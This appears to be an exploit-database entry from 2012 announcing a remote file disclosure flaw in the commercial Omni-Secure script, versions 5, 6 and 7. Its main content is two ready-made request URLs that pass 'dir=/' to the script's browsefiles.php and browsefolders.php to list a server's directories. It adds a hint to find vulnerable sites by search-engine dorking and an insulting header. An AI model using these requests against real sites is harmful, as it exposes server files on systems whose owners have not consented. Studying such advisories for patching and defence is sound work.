id: 19768
date: 11/20/2012
title: Omni-Secure 5 / 6 / 7 Remote File Disclosure
author: HaCkeR_EgY
cves: 

###################         Remote File Discloure           ###################
#                                                                             #
#                      "Omni-secure" version 5 / 6 / 7                        #  
#                                                                             #
#### Viva Egypt & Grief and sorrow for the disaster Assiut, fUCK U QANDIL #####
                       Greetz to : EL MOGHAZY  & EL Mery


Author:Mohamed Gaber "Hacker_Egy in the paste :) "
email :hacker_egy@hotmail.com 

Script : omni-secure version 5/6/7
Price :$197
Url: http://omni-secure.com/buy.php
Demo :http://omni-secure.com/new_demo7/

--------------------------------------------------------------

Dork : ask google :)
exploit :http://localhost/path/lib/browsefiles.php?dir=/
         http://localhost/path/lib/browsefolders.php?dir=/



requirement : safe mode :off

---------------------------------------------------------------

#  0day.today [2023-03-24]  #